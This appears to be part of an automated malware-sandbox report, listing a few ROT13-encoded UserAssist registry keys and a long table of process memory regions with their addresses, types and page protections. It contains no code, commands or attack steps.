HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 15 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
CE4E000
|
direct allocation
|
page execute and read and write
|
|
|
|
1500000
|
system
|
page execute and read and write
|
|
|
|
36A0000
|
trusted library allocation
|
page read and write
|
|
|
|
5C62000
|
trusted library allocation
|
page read and write
|
|
|
|
8910000
|
direct allocation
|
page execute and read and write
|
|
|
|
3200000
|
system
|
page execute and read and write
|
|
|
|
2F30000
|
system
|
page execute and read and write
|
|
|
|
38D0000
|
unkown
|
page execute and read and write
|
|
|
|
1EF38E41000
|
trusted library allocation
|
page read and write
|
|
|
|
25560000
|
unclassified section
|
page execute and read and write
|
|
|
|
3660000
|
trusted library allocation
|
page read and write
|
|
|
|
237E000
|
unkown
|
page read and write
|
||
|
6D5A7FE000
|
stack
|
page read and write
|
||
|
22CBEBF9000
|
heap
|
page read and write
|
||
|
4FD0000
|
heap
|
page read and write
|
||
|
22CC0A8B000
|
heap
|
page read and write
|
||
|
22CBEC20000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2FDF000
|
stack
|
page read and write
|
||
|
5E7000
|
unkown
|
page readonly
|
||
|
22CBEC96000
|
heap
|
page read and write
|
||
|
1490000
|
unkown
|
page read and write
|
||
|
3820000
|
trusted library allocation
|
page read and write
|
||
|
D84E000
|
direct allocation
|
page execute and read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
22CC0AC0000
|
heap
|
page read and write
|
||
|
302A000
|
trusted library allocation
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
497E000
|
stack
|
page read and write
|
||
|
22CC0E12000
|
heap
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
1EF412CC000
|
heap
|
page read and write
|
||
|
155E000
|
system
|
page execute and read and write
|
||
|
342E000
|
heap
|
page read and write
|
||
|
82A6000
|
heap
|
page read and write
|
||
|
C9E000
|
stack
|
page read and write
|
||
|
22CC0A71000
|
heap
|
page read and write
|
||
|
22CC0CF6000
|
heap
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
22CC0AB7000
|
heap
|
page read and write
|
||
|
39D9000
|
direct allocation
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
70F0000
|
direct allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2EE1000
|
heap
|
page read and write
|
||
|
9CA3BFB000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
860D000
|
heap
|
page read and write
|
||
|
341A000
|
heap
|
page read and write
|
||
|
389D000
|
stack
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
1EF28DD1000
|
trusted library allocation
|
page read and write
|
||
|
4E40000
|
heap
|
page read and write
|
||
|
2EE0000
|
unkown
|
page readonly
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
22CC0BDB000
|
heap
|
page read and write
|
||
|
22CC0AD6000
|
heap
|
page read and write
|
||
|
22CC0BFE000
|
heap
|
page read and write
|
||
|
8A84000
|
heap
|
page read and write
|
||
|
8655000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
34E3000
|
heap
|
page read and write
|
||
|
8930000
|
direct allocation
|
page read and write
|
||
|
22CC0AEE000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2DE0000
|
unkown
|
page readonly
|
||
|
6D5ADFE000
|
stack
|
page read and write
|
||
|
22CC0A85000
|
heap
|
page read and write
|
||
|
1EF2987D000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
C44E000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
8A90000
|
heap
|
page read and write
|
||
|
1350000
|
unkown
|
page readonly
|
||
|
22CC1111000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
D68000
|
heap
|
page read and write
|
||
|
88E0000
|
direct allocation
|
page read and write
|
||
|
22CC0E71000
|
heap
|
page read and write
|
||
|
88B7000
|
heap
|
page read and write
|
||
|
1EF41514000
|
heap
|
page read and write
|
||
|
1EF413B2000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
22CC0D0E000
|
heap
|
page read and write
|
||
|
22CC0A87000
|
heap
|
page read and write
|
||
|
2E8E000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
2705000
|
heap
|
page read and write
|
||
|
23AB0000
|
direct allocation
|
page read and write
|
||
|
8623000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0E12000
|
heap
|
page read and write
|
||
|
22CC0ADD000
|
heap
|
page read and write
|
||
|
22CC0A9E000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF4128D000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page read and write
|
||
|
22CC1013000
|
heap
|
page read and write
|
||
|
341A000
|
heap
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
7FFD34856000
|
trusted library allocation
|
page read and write
|
||
|
CA0000
|
unkown
|
page readonly
|
||
|
8360000
|
heap
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0CE3000
|
heap
|
page read and write
|
||
|
389C000
|
heap
|
page read and write
|
||
|
1EF2AA03000
|
trusted library allocation
|
page read and write
|
||
|
660E000
|
remote allocation
|
page execute and read and write
|
||
|
D1A000
|
stack
|
page read and write
|
||
|
22CC0B9E000
|
heap
|
page read and write
|
||
|
1CEEDD30000
|
heap
|
page read and write
|
||
|
1163000
|
unkown
|
page read and write
|
||
|
22CC0CD3000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2702000
|
heap
|
page read and write
|
||
|
1EF390BC000
|
trusted library allocation
|
page read and write
|
||
|
22CC0ADE000
|
heap
|
page read and write
|
||
|
22CC0C0D000
|
heap
|
page read and write
|
||
|
77AE000
|
stack
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
C59000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
1EF4156A000
|
heap
|
page read and write
|
||
|
1EF27404000
|
heap
|
page read and write
|
||
|
22CBECB1000
|
heap
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1740000
|
unkown
|
page readonly
|
||
|
85E2000
|
heap
|
page read and write
|
||
|
D9F000
|
heap
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
8288000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
831E000
|
stack
|
page read and write
|
||
|
5130000
|
heap
|
page read and write
|
||
|
22CC0BCC000
|
heap
|
page read and write
|
||
|
24B60000
|
unclassified section
|
page execute and read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
7160000
|
heap
|
page read and write
|
||
|
22CC0A7D000
|
heap
|
page read and write
|
||
|
382B000
|
heap
|
page read and write
|
||
|
9CA35FF000
|
stack
|
page read and write
|
||
|
1EF40DDE000
|
heap
|
page read and write
|
||
|
22CC0CFE000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
573F000
|
stack
|
page read and write
|
||
|
31C2000
|
unkown
|
page read and write
|
||
|
6D6E000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1AD0000
|
unkown
|
page readonly
|
||
|
A3D000
|
stack
|
page read and write
|
||
|
577C000
|
stack
|
page read and write
|
||
|
840E000
|
remote allocation
|
page execute and read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
22CC0BCC000
|
heap
|
page read and write
|
||
|
4E8F000
|
stack
|
page read and write
|
||
|
8880000
|
heap
|
page read and write
|
||
|
88B9000
|
heap
|
page read and write
|
||
|
505C000
|
stack
|
page read and write
|
||
|
36FE000
|
heap
|
page read and write
|
||
|
1EF2AFD1000
|
trusted library allocation
|
page read and write
|
||
|
1EF2A2CC000
|
trusted library allocation
|
page read and write
|
||
|
3080000
|
trusted library allocation
|
page execute and read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
22CC0C74000
|
heap
|
page read and write
|
||
|
22CC0AFB000
|
heap
|
page read and write
|
||
|
9CA36FD000
|
stack
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
2F90000
|
direct allocation
|
page read and write
|
||
|
5DE000
|
unkown
|
page readonly
|
||
|
3180000
|
heap
|
page read and write
|
||
|
22CC0C4F000
|
heap
|
page read and write
|
||
|
22CC0C8C000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2B2E000
|
unkown
|
page read and write
|
||
|
13F4000
|
heap
|
page read and write
|
||
|
15DB000
|
system
|
page execute and read and write
|
||
|
22CC0C85000
|
heap
|
page read and write
|
||
|
22CC0BA0000
|
heap
|
page read and write
|
||
|
7DD000
|
stack
|
page read and write
|
||
|
22CC0BAD000
|
heap
|
page read and write
|
||
|
30F0000
|
unkown
|
page read and write
|
||
|
22CC0BBF000
|
heap
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
22CC0A9B000
|
heap
|
page read and write
|
||
|
82DF000
|
heap
|
page read and write
|
||
|
3356000
|
heap
|
page read and write
|
||
|
22CC0C43000
|
heap
|
page read and write
|
||
|
341A000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
861F000
|
heap
|
page read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
22CC0C91000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
827A000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF27345000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CBEC2D000
|
heap
|
page read and write
|
||
|
22CC0C12000
|
heap
|
page read and write
|
||
|
887F000
|
stack
|
page read and write
|
||
|
3B7D000
|
direct allocation
|
page execute and read and write
|
||
|
22CBEBC0000
|
heap
|
page read and write
|
||
|
39DD000
|
direct allocation
|
page execute and read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
1EF2AD06000
|
trusted library allocation
|
page read and write
|
||
|
5E7000
|
unkown
|
page readonly
|
||
|
3541000
|
heap
|
page read and write
|
||
|
924E000
|
direct allocation
|
page execute and read and write
|
||
|
8982000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2416F000
|
stack
|
page read and write
|
||
|
1EF271C0000
|
heap
|
page read and write
|
||
|
74DD000
|
heap
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
1EF273C5000
|
heap
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
22CC0CAC000
|
heap
|
page read and write
|
||
|
22CC100A000
|
heap
|
page read and write
|
||
|
242CF000
|
stack
|
page read and write
|
||
|
4888000
|
trusted library allocation
|
page read and write
|
||
|
148E000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
859E000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF28FF8000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF38DE0000
|
trusted library allocation
|
page read and write
|
||
|
3827000
|
heap
|
page read and write
|
||
|
22CC1017000
|
heap
|
page read and write
|
||
|
B2F000
|
stack
|
page read and write
|
||
|
2330000
|
heap
|
page read and write
|
||
|
827E000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2449F000
|
stack
|
page read and write
|
||
|
88B5000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
6D5B84E000
|
stack
|
page read and write
|
||
|
7677000
|
trusted library allocation
|
page read and write
|
||
|
22CC0E71000
|
heap
|
page read and write
|
||
|
5DE000
|
unkown
|
page readonly
|
||
|
6D5A673000
|
stack
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
24B52000
|
direct allocation
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2435C000
|
stack
|
page read and write
|
||
|
A2EE000
|
stack
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
F80000
|
unkown
|
page readonly
|
||
|
D60000
|
unkown
|
page readonly
|
||
|
3420000
|
heap
|
page read and write
|
||
|
22CC0AA6000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
4E2E000
|
stack
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
22CC0A77000
|
heap
|
page read and write
|
||
|
D50000
|
unkown
|
page readonly
|
||
|
10FC000
|
stack
|
page read and write
|
||
|
6FA0000
|
direct allocation
|
page read and write
|
||
|
22CC1070000
|
heap
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
3640000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF41501000
|
heap
|
page read and write
|
||
|
340E000
|
remote allocation
|
page execute and read and write
|
||
|
1EF2737E000
|
heap
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
8A4F000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
23E50000
|
heap
|
page read and write
|
||
|
22CBECD1000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
1EF414A8000
|
heap
|
page read and write
|
||
|
8253000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
1370000
|
heap
|
page read and write
|
||
|
1CEEC0F0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
244A1000
|
heap
|
page read and write
|
||
|
3EDC000
|
unclassified section
|
page read and write
|
||
|
82AC000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
3020000
|
trusted library allocation
|
page read and write
|
||
|
9A9000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2ECF000
|
stack
|
page read and write
|
||
|
1EF298BE000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
8600000
|
heap
|
page read and write
|
||
|
1EF2AFCA000
|
trusted library allocation
|
page read and write
|
||
|
6F40000
|
direct allocation
|
page read and write
|
||
|
165F000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0BA9000
|
heap
|
page read and write
|
||
|
22CBEC1F000
|
heap
|
page read and write
|
||
|
48FE000
|
stack
|
page read and write
|
||
|
8450000
|
trusted library allocation
|
page execute and read and write
|
||
|
551E000
|
stack
|
page read and write
|
||
|
23A50000
|
direct allocation
|
page read and write
|
||
|
8274000
|
heap
|
page read and write
|
||
|
22CC0EB8000
|
heap
|
page read and write
|
||
|
249AE000
|
direct allocation
|
page execute and read and write
|
||
|
5E5000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
|
3B15000
|
unkown
|
page execute and read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
82E8000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF41390000
|
heap
|
page read and write
|
||
|
26AD000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF27340000
|
heap
|
page read and write
|
||
|
22CC0BD9000
|
heap
|
page read and write
|
||
|
1EF27300000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
22CC0C0D000
|
heap
|
page read and write
|
||
|
14F0000
|
heap
|
page read and write
|
||
|
1EF414AD000
|
heap
|
page read and write
|
||
|
22CC0D0E000
|
heap
|
page read and write
|
||
|
1448000
|
heap
|
page read and write
|
||
|
C90000
|
unkown
|
page readonly
|
||
|
22CC0C41000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0C12000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF41553000
|
heap
|
page read and write
|
||
|
8956000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page read and write
|
||
|
DE1000
|
unkown
|
page readonly
|
||
|
22CC0BD0000
|
heap
|
page read and write
|
||
|
8317000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF273C7000
|
heap
|
page read and write
|
||
|
A64E000
|
direct allocation
|
page execute and read and write
|
||
|
22CC0C45000
|
heap
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
15D000
|
stack
|
page read and write
|
||
|
6F80000
|
direct allocation
|
page read and write
|
||
|
3060000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF273D9000
|
heap
|
page read and write
|
||
|
1EF4154F000
|
heap
|
page read and write
|
||
|
22CC0BBD000
|
heap
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
33EE000
|
stack
|
page read and write
|
||
|
22CC0A96000
|
heap
|
page read and write
|
||
|
22CBED90000
|
remote allocation
|
page read and write
|
||
|
1EF272C0000
|
heap
|
page read and write
|
||
|
22CC0FA2000
|
heap
|
page read and write
|
||
|
22CC0B03000
|
heap
|
page read and write
|
||
|
22CC0ACE000
|
heap
|
page read and write
|
||
|
244AD000
|
heap
|
page read and write
|
||
|
73F7000
|
trusted library allocation
|
page read and write
|
||
|
AC5E1FF000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
8A8D000
|
heap
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0BAE000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF4154D000
|
heap
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
22CC0CA9000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
8966000
|
heap
|
page read and write
|
||
|
22CC0E71000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
DCC000
|
heap
|
page read and write
|
||
|
896B000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CBEBF0000
|
heap
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
1EF4128F000
|
heap
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
163C000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1CEEC415000
|
heap
|
page read and write
|
||
|
1EF38DD1000
|
trusted library allocation
|
page read and write
|
||
|
6FB0000
|
direct allocation
|
page read and write
|
||
|
22CC0BD0000
|
heap
|
page read and write
|
||
|
826D000
|
heap
|
page read and write
|
||
|
22CC0CCC000
|
heap
|
page read and write
|
||
|
30EF000
|
unkown
|
page read and write
|
||
|
335E000
|
heap
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
22CC0B0B000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
24220000
|
direct allocation
|
page read and write
|
||
|
5E7000
|
unkown
|
page readonly
|
||
|
23F8E000
|
stack
|
page read and write
|
||
|
22CC0AAB000
|
heap
|
page read and write
|
||
|
15F0000
|
unkown
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
AC5DDAD000
|
stack
|
page read and write
|
||
|
1EF2986B000
|
trusted library allocation
|
page read and write
|
||
|
832B000
|
heap
|
page read and write
|
||
|
2FE0000
|
trusted library section
|
page read and write
|
||
|
1EF4155F000
|
heap
|
page read and write
|
||
|
7100000
|
direct allocation
|
page read and write
|
||
|
32DDF1F000
|
stack
|
page read and write
|
||
|
22CC0B04000
|
heap
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
23A00000
|
direct allocation
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page read and write
|
||
|
3E0E000
|
remote allocation
|
page execute and read and write
|
||
|
22CC0AD3000
|
heap
|
page read and write
|
||
|
1EF28DC5000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3820000
|
trusted library allocation
|
page read and write
|
||
|
22CC0F26000
|
heap
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
9CA3AFF000
|
stack
|
page read and write
|
||
|
18D0000
|
unkown
|
page readonly
|
||
|
1370000
|
heap
|
page read and write
|
||
|
1EF41370000
|
heap
|
page execute and read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
|
8264000
|
heap
|
page read and write
|
||
|
1EF273B9000
|
heap
|
page read and write
|
||
|
881E000
|
stack
|
page read and write
|
||
|
1EF28D97000
|
heap
|
page execute and read and write
|
||
|
82CA000
|
heap
|
page read and write
|
||
|
1EF2A9D5000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
direct allocation
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
3541000
|
heap
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
8968000
|
heap
|
page read and write
|
||
|
D50000
|
unkown
|
page readonly
|
||
|
1EF28E56000
|
trusted library allocation
|
page read and write
|
||
|
22CC0A79000
|
heap
|
page read and write
|
||
|
1EF41555000
|
heap
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
82E4000
|
heap
|
page read and write
|
||
|
1EF2AA18000
|
trusted library allocation
|
page read and write
|
||
|
6DAE000
|
stack
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
8350000
|
trusted library allocation
|
page read and write
|
||
|
D05000
|
heap
|
page read and write
|
||
|
5D1000
|
unkown
|
page execute read
|
||
|
22CC0B71000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
300D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3780000
|
trusted library allocation
|
page execute and read and write
|
||
|
1230000
|
unkown
|
page readonly
|
||
|
520E000
|
remote allocation
|
page execute and read and write
|
||
|
42C4000
|
unclassified section
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
22CC0AB3000
|
heap
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34B00000
|
trusted library allocation
|
page read and write
|
||
|
3239000
|
stack
|
page read and write
|
||
|
59C1000
|
trusted library allocation
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
9CA39FE000
|
stack
|
page read and write
|
||
|
22CC0A7E000
|
heap
|
page read and write
|
||
|
DF0000
|
unkown
|
page read and write
|
||
|
22CC0B04000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3240000
|
remote allocation
|
page execute and read and write
|
||
|
887E000
|
stack
|
page read and write
|
||
|
22CC0E12000
|
heap
|
page read and write
|
||
|
1AD0000
|
unkown
|
page readonly
|
||
|
528F000
|
stack
|
page read and write
|
||
|
1360000
|
unkown
|
page readonly
|
||
|
1CEEC040000
|
heap
|
page read and write
|
||
|
1EF27350000
|
trusted library allocation
|
page read and write
|
||
|
9CA30FA000
|
stack
|
page read and write
|
||
|
22CC1112000
|
heap
|
page read and write
|
||
|
5E7000
|
unkown
|
page readonly
|
||
|
1EF2AD8C000
|
trusted library allocation
|
page read and write
|
||
|
6F70000
|
direct allocation
|
page read and write
|
||
|
1EF28C20000
|
heap
|
page readonly
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7DF415C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CBEAC0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0BFE000
|
heap
|
page read and write
|
||
|
22CC0C0D000
|
heap
|
page read and write
|
||
|
22CC0AC5000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1CEEC410000
|
heap
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
22CC0C71000
|
heap
|
page read and write
|
||
|
22CC0AA5000
|
heap
|
page read and write
|
||
|
56FE000
|
stack
|
page read and write
|
||
|
CDD000
|
stack
|
page read and write
|
||
|
73EF000
|
stack
|
page read and write
|
||
|
8269000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
74E5000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
49EF000
|
stack
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
74AA000
|
heap
|
page read and write
|
||
|
1EF2ADA0000
|
trusted library allocation
|
page read and write
|
||
|
8940000
|
direct allocation
|
page read and write
|
||
|
89BF000
|
stack
|
page read and write
|
||
|
22CC0D19000
|
heap
|
page read and write
|
||
|
22CC0AF8000
|
heap
|
page read and write
|
||
|
8280000
|
heap
|
page read and write
|
||
|
3B81000
|
direct allocation
|
page execute and read and write
|
||
|
341A000
|
heap
|
page read and write
|
||
|
A9F7000
|
trusted library allocation
|
page read and write
|
||
|
1EF41225000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
5D1000
|
unkown
|
page execute read
|
||
|
14D0000
|
unkown
|
page readonly
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
1648000
|
heap
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
C8B000
|
stack
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page read and write
|
||
|
1EF28C30000
|
trusted library allocation
|
page read and write
|
||
|
6D5A77E000
|
stack
|
page read and write
|
||
|
27AD000
|
stack
|
page read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
22CC0C71000
|
heap
|
page read and write
|
||
|
22CC0ABE000
|
heap
|
page read and write
|
||
|
22CC0AF3000
|
heap
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
22CC0EB8000
|
heap
|
page read and write
|
||
|
1340000
|
unkown
|
page readonly
|
||
|
59D9000
|
trusted library allocation
|
page read and write
|
||
|
8AFE000
|
stack
|
page read and write
|
||
|
22CC0C84000
|
heap
|
page read and write
|
||
|
5341000
|
trusted library allocation
|
page read and write
|
||
|
772E000
|
stack
|
page read and write
|
||
|
8A80000
|
heap
|
page read and write
|
||
|
22CBED90000
|
remote allocation
|
page read and write
|
||
|
1EF298A5000
|
trusted library allocation
|
page read and write
|
||
|
855B000
|
stack
|
page read and write
|
||
|
883E000
|
stack
|
page read and write
|
||
|
2F53000
|
heap
|
page read and write
|
